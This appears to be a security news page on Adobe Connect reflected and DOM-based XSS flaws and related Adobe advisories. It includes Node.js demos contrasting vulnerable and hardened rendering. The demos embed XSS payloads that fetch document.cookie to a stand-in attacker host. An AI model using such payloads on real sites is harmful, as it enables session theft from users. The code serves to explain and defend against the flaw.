Adobe Connect Patches Reflected XSS Flaws Allowing Script Execution via Crafted URLs
Adobe disclosed two high-severity reflected cross-site scripting vulnerabilities in Adobe Connect—CVE-2026-27245 and CVE-2026-27243—affecting versions 2025.3, 12.10, and earlier. The flaws allow an attacker to trigger execution of malicious JavaScript in a victim’s browser if the victim is persuaded to open a specially crafted URL pointing to a vulnerable page.
Both issues are classified as CWE-79 and carry the same CVSS v3.1 vector, AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N (base score 9.3): exploitable over the network with low complexity and no privileges, but requiring user interaction, since the victim must open the attacker's link. Adobe documented both in security bulletin APSB26-37. Scope is marked changed because the vulnerable component is the Connect server while the impact lands in the victim's browser; with high confidentiality and integrity impact, script injected this way runs in the Connect origin, can read whatever the victim's session can reach and can perform actions as that user. Availability is unaffected.
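To make the bug class concrete, the following is an added illustration, not code from Adobe Connect or from the bulletin: a minimal Node.js page renderer that echoes a query parameter, shown in its vulnerable form, with a tag-stripping "fix" that does not work, and with proper output encoding. The endpoint path, the `name` parameter, the hostnames and the two payloads are assumptions for the demo; nothing here models how the real Connect pages are built.

```javascript
// Added example (not Adobe Connect code): how a reflected XSS like the ones in
// APSB26-37 arises and why output encoding, not tag filtering, is the fix.
// Runs under Node.js; the endpoint, parameter name and payloads are assumptions.

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected XSS source: a query parameter the server echoes back to the browser.
function nameParam(requestUrl) {
  return new URL(requestUrl).searchParams.get('name') ?? '';
}

// Vulnerable: untrusted input is concatenated straight into the HTML body.
function renderVulnerable(requestUrl) {
  return `<h1>Welcome back, ${nameParam(requestUrl)}</h1>`;
}

// Common non-fix: strip <script> tags. Bypassed by any element with an event handler.
function renderNaiveFilter(requestUrl) {
  const filtered = nameParam(requestUrl).replace(/<\/?script[^>]*>/gi, '');
  return `<h1>Welcome back, ${filtered}</h1>`;
}

// Hardened: encode at the point of insertion, for the HTML-text context.
function renderHardened(requestUrl) {
  return `<h1>Welcome back, ${escapeHtml(nameParam(requestUrl))}</h1>`;
}

// Rough check used by the demo: does the markup contain something a browser
// would execute on load (a script element or an inline on* handler attribute)?
function containsExecutableMarkup(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Constructed attacker URLs. In the real attack the victim is lured into opening one.
const BASE = 'https://connect.example.invalid/welcome';
const SCRIPT_URL = BASE + '?name=' + encodeURIComponent(
  '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>');
const HANDLER_URL = BASE + '?name=' + encodeURIComponent(
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\' + document.cookie)">');

// For each renderer, report whether the attacker's markup survives intact.
function demo() {
  return {
    vulnerableScript: containsExecutableMarkup(renderVulnerable(SCRIPT_URL)), // true
    naiveScript: containsExecutableMarkup(renderNaiveFilter(SCRIPT_URL)),     // false: this payload is stripped
    naiveHandler: containsExecutableMarkup(renderNaiveFilter(HANDLER_URL)),   // true: filter bypassed
    hardenedScript: containsExecutableMarkup(renderHardened(SCRIPT_URL)),     // false
    hardenedHandler: containsExecutableMarkup(renderHardened(HANDLER_URL)),   // false
  };
}

console.log(demo());
```

Run it with `node reflected_xss_demo.js`. The encoder above is only correct for the HTML-text and quoted-attribute contexts; data placed inside a script block, a URL or an unquoted attribute needs a different encoder for that context, and a Content-Security-Policy that disallows inline script is worth adding as a second layer. The same output-encoding fix applies to stored XSS, where the payload arrives from a database instead of the URL.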
Timeline
Apr 14, 2026
Adobe discloses Adobe Connect reflected XSS vulnerabilities
Adobe disclosed CVE-2026-27243 and CVE-2026-27245, two reflected cross-site scripting flaws affecting Adobe Connect versions 2025.3, 12.10, and earlier. The issues were documented in Adobe security bulletin APSB26-37 and can allow malicious JavaScript execution if a user visits a crafted URL.
Related Stories

Adobe Connect Flaws Expose Users to XSS and Potential Code Execution
Adobe disclosed two high-severity vulnerabilities in **Adobe Connect** affecting versions **2025.3, 12.10, and earlier**, and directed customers to advisory **`APSB26-37`** for remediation. One issue, **`CVE-2026-27246`**, is a DOM-based cross-site scripting flaw classified as **`CWE-79`** that can let an attacker manipulate the browser DOM and run malicious JavaScript in a victim’s session after luring the user to a crafted webpage. The vulnerability carries a CVSS v3.1 vector of **`AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N`**, indicating network reachability, low attack complexity, no privileges required, and high confidentiality and integrity impact. Adobe also disclosed **`CVE-2026-34615`**, a **`CWE-502`** deserialization of untrusted data vulnerability in the same product versions that can lead to arbitrary code execution in the context of the current user. Adobe said exploitation of the deserialization flaw does not require user interaction, making it the more serious of the two issues, while both bugs were published through Adobe’s PSIRT process and affect the same supported and earlier Adobe Connect releases. Organizations using Adobe Connect should prioritize patching exposed deployments and reviewing the vendor advisory for fixed versions and mitigation guidance.
2 weeks ago
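The DOM-based variant in that story differs from the reflected one in where the taint flows: the payload is consumed by client-side script and may never reach the server. As an added illustration that is not Adobe Connect's code, the following Node.js snippet shows a page script that copies the URL fragment into `innerHTML`, beside a version that validates the value and writes it through `textContent`. A small stand-in class takes the place of a DOM element so the example runs without a browser; the fragment format, the element and the payloads are assumptions for the demo.

```javascript
// Added example (not Adobe Connect code): the DOM-based XSS pattern, where the
// tainted data never reaches the server. Runs under Node.js with a tiny stand-in
// for a DOM element; the fragment format and element are assumptions for the demo.

// Stand-in for an element so the example runs without a browser. Its innerHTML
// setter models one browser rule that matters for payload choice: <script>
// elements inserted through innerHTML are NOT executed, but inline event-handler
// attributes (onerror, onload, ...) on inserted elements are. The attribute scan
// is a simplification, not an HTML parser.
class FakeElement {
  constructor() { this.html = ''; this.text = ''; this.firedHandlers = []; }
  set innerHTML(markup) {
    this.html = markup;
    for (const m of markup.matchAll(/<[a-z][^>]*?\s(on[a-z]+)\s*=/gi)) {
      this.firedHandlers.push(m[1].toLowerCase());
    }
  }
  get innerHTML() { return this.html; }
  // textContent is a text sink: markup is rendered as literal characters.
  set textContent(s) { this.text = String(s); this.html = ''; }
  get textContent() { return this.text; }
}

// Vulnerable client-side code. Source: location.hash (the fragment is not sent to
// the server, so no server-side filter ever sees it). Sink: innerHTML.
function showRoomVulnerable(hash, el) {
  const room = decodeURIComponent(hash.slice(1)); // whole fragment taken as the room name (assumption)
  el.innerHTML = '<h2>Joining room: ' + room + '</h2>';
  return el;
}

// Hardened: validate the expected shape, then write through a text sink only.
function showRoomHardened(hash, el) {
  const room = decodeURIComponent(hash.slice(1));
  const ok = /^[A-Za-z0-9_-]{1,64}$/.test(room);
  el.textContent = 'Joining room: ' + (ok ? room : '(invalid name)');
  return el;
}

// Constructed fragments, as they would appear after the # in a lured-to URL.
const HANDLER_HASH = '#' + encodeURIComponent(
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\' + document.cookie)">');
const SCRIPT_HASH = '#' + encodeURIComponent('<script>alert(1)</script>');
const BENIGN_HASH = '#' + encodeURIComponent('blue_room-1');

// Summarise what each version does with each fragment.
function demo() {
  return {
    vulnerableHandler: showRoomVulnerable(HANDLER_HASH, new FakeElement()).firedHandlers, // ['onerror']
    vulnerableScript: showRoomVulnerable(SCRIPT_HASH, new FakeElement()).firedHandlers,   // [] (markup inserted, not run)
    hardenedHandler: showRoomHardened(HANDLER_HASH, new FakeElement()).firedHandlers,     // []
    hardenedBenign: showRoomHardened(BENIGN_HASH, new FakeElement()).textContent,         // 'Joining room: blue_room-1'
  };
}

console.log(demo());
```

Run it with `node dom_xss_demo.js`. Two practical consequences follow from the pattern: a WAF or server-side filter cannot block a fragment-based payload because the fragment never leaves the browser, and hunting for DOM XSS means tracing sources such as `location.hash`, `location.search` and `document.referrer` to sinks such as `innerHTML`, `document.write` and `eval` in the shipped JavaScript.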
Critical Vulnerabilities Patched in Multiple Adobe Products Allowing Arbitrary Code Execution
Adobe released urgent security updates addressing over 35 vulnerabilities across a wide range of its products, with several flaws rated as critical due to their potential to allow arbitrary code execution. The most severe vulnerabilities affect Adobe Connect, Adobe Commerce, Magento Open Source, Creative Cloud Desktop, Bridge, Animate, and other widely used applications. Among the most critical issues are two DOM-based cross-site scripting (XSS) vulnerabilities in Adobe Connect, identified as CVE-2025-49553 and CVE-2025-49552, with CVSS scores of 9.3 and 7.3 respectively. These vulnerabilities could enable attackers to execute arbitrary code on targeted systems if exploited. Additionally, a moderate-severity open redirect vulnerability (CVE-2025-54196) was also patched in Adobe Connect. The vulnerabilities were disclosed by a security researcher known as Laish (a_l), and Adobe Connect users are specifically urged to update to version 12.10 for both Windows and macOS to mitigate these risks. Adobe Commerce and Magento Open Source, both critical e-commerce platforms, were also affected by high-risk vulnerabilities that could potentially compromise online stores. Other Adobe products receiving security updates include Creative Cloud, Bridge, Animate, Experience Manager, Substance 3D Viewer, Substance 3D Modeler, FrameMaker, Illustrator, Dimension, and Substance 3D Stager. Adobe has stated that, as of the time of the advisory, there is no evidence that these vulnerabilities have been exploited in the wild. Nevertheless, the company strongly recommends that all customers apply the updates immediately to prevent potential exploitation. The vulnerabilities span a variety of attack vectors, including XSS and open redirect, which could be leveraged for code execution or phishing attacks. The breadth of affected products highlights the widespread risk to organizations relying on Adobe’s software for collaboration, content creation, and e-commerce. 
Security advisories from both industry groups and Adobe emphasize the urgency of patching, especially for organizations using Adobe Connect and e-commerce platforms. The updates are part of Adobe’s regular security cycle, but the critical nature of several flaws makes this release particularly important. Organizations are advised to review their deployment of Adobe products and prioritize patching based on the severity and exposure of affected systems. The disclosure and rapid patching of these vulnerabilities underscore the ongoing need for vigilance and timely software updates in enterprise environments. Adobe’s response demonstrates a coordinated effort to address security risks across its product suite. The advisories provide detailed information on affected versions and recommended mitigation steps. Security teams should monitor for any signs of attempted exploitation and ensure that all relevant systems are updated promptly. The incident serves as a reminder of the persistent threat posed by software vulnerabilities in widely deployed applications.
1 month ago
Multiple Stored XSS Vulnerabilities in Adobe Commerce
Adobe disclosed multiple **stored cross-site scripting (XSS)** vulnerabilities in **Adobe Commerce** affecting versions `2.4.9-alpha3`, `2.4.8-p3`, `2.4.7-p8`, `2.4.6-p13`, `2.4.5-p15`, `2.4.4-p16`, and earlier. The issues, tracked as `CVE-2026-21284`, `CVE-2026-21290`, `CVE-2026-21311`, and `CVE-2026-21361`, allow malicious JavaScript to be injected into vulnerable form fields and later executed in a victim's browser when the affected page is viewed. Adobe indicates the impact can include **session takeover** and high confidentiality and integrity risk. The vulnerabilities differ primarily in the privilege level required to plant the payload: most require a **high-privileged attacker**, while at least one (`CVE-2026-21290`) is exploitable by a **low-privileged attacker**. In all cases exploitation requires **user interaction**, since a victim must browse to the page containing the injected content.
1 month ago